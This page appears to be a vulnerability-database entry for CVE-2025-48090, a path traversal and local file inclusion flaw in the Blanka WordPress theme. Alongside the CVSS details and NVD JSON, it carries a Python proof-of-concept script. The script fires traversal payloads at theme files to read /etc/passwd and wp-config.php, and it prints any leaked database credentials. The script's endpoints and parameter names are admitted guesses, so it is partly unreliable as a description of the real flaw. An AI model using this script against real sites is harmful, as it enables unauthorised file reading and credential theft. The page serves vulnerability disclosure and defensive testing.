Security Vulnerability Report
中文
CVE-2025-48090 CVSS 8.1 HIGH

CVE-2025-48090

Published: 2025-11-06 16:15:52
Last Modified: 2026-04-27 20:16:07

Description

Path Traversal: '.../...//' vulnerability in CocoBasic Blanka - One Page WordPress Theme blanka-wp allows PHP Local File Inclusion.This issue affects Blanka - One Page WordPress Theme: from n/a through < 1.5.

CVSS Details

CVSS Score
8.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Blanka - One Page WordPress Theme < 1.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 """ CVE-2025-48090 PoC - Blanka WordPress Theme Path Traversal LFI Reference: https://nvd.nist.gov/vuln/detail/CVE-2025-48090 """ import requests import sys TARGET_URL = "http://target-site.com/" # Common vulnerable endpoint patterns in WordPress themes VULNERABLE_PATHS = [ "wp-content/themes/blanka-wp/includes/shortcodes.php", "wp-content/themes/blanka-wp/inc/ajax.php", "wp-content/themes/blanka-wp/functions.php" ] def test_path_traversal(target_url): """Test for Path Traversal vulnerability in Blanka theme""" # Files to read for verification test_files = [ "../../../../../../../../etc/passwd", "....//....//....//....//....//....//....//....//etc/passwd", ".../...//.../...//.../...//.../...//etc/passwd" ] print(f"[*] Testing CVE-2025-48090 on {target_url}") print(f"[*] Target: Blanka WordPress Theme < 1.5") for path in VULNERABLE_PATHS: for test in test_files: # Construct the attack URL params = { "file": test # Common parameter names: file, path, page, template, etc. } url = target_url + path try: response = requests.get(url, params=params, timeout=10, verify=False) # Check if file content is leaked if "root:" in response.text or "bin:" in response.text: print(f"[!] VULNERABLE! Path: {path}") print(f"[!] Payload: {test}") print(f"[+] Leaked content preview:") print(response.text[:500]) return True # Try to read wp-config.php wpconfig_payload = ".../...//.../...//.../...//.../...//wp-config.php" params["file"] = wpconfig_payload response = requests.get(url, params=params, timeout=10, verify=False) if "DB_NAME" in response.text or "DB_PASSWORD" in response.text: print(f"[!] CRITICAL: wp-config.php leaked!") print(f"[+] Content preview:") print(response.text[:800]) return True except requests.RequestException as e: print(f"[-] Request failed: {e}") continue print("[*] No obvious vulnerability detected (manual testing may be required)") return False if __name__ == "__main__": if len(sys.argv) > 1: TARGET_URL = sys.argv[1] test_path_traversal(TARGET_URL)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-48090", "sourceIdentifier": "[email protected]", "published": "2025-11-06T16:15:52.423", "lastModified": "2026-04-27T20:16:07.070", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Path Traversal: '.../...//' vulnerability in CocoBasic Blanka - One Page WordPress Theme blanka-wp allows PHP Local File Inclusion.This issue affects Blanka - One Page WordPress Theme: from n/a through < 1.5."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-35"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Theme/blanka-wp/vulnerability/wordpress-blanka-one-page-wordpress-theme-theme-1-5-local-file-inclusion-vulnerability?_s_id=cve", "source": "[email protected]"}]}}